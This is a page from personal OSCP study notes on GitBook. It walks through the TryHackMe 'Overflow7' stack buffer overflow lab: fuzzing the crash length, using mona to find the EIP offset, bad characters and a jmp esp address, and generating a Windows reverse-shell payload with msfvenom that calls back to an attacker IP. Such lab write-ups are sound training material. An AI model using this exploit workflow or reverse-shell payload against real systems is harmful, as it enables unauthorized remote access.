📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • 1. Fuzz application to find number of bytes needed to crash the application
  • 2. Set mona configuration
  • 3. Find EIP offset
  • 4. Find bad characters
  • 5. Find jmp esp instruction sets without any bad characters
  • 6. Generate shellcode
  • 7. Set nop sled in padding

Was this helpful?

  1. Buffer overflow
  2. TryHackMe Practice

Overflow7

1. Fuzz application to find number of bytes needed to crash the application

Bytes needed to crash application: 1400

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find EIP offset

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1400

!mona findmsp -distance 1400

EIP offset: 1306

4. Find bad characters

!mona bytearray -b "\x00"

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

Bad characters: \x00\x8c\xae\xbe\xfb

5. Find jmp esp instruction sets without any bad characters

!mona jmp -r esp -cpb "\x00\x8c\xae\xbe\xfb"

Return address: 0x625011af

6. Generate shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x8c\xae\xbe\xfb" -f c

7. Set nop sled in padding

PreviousOverflow6NextOverflow8

Last updated 3 years ago

Was this helpful?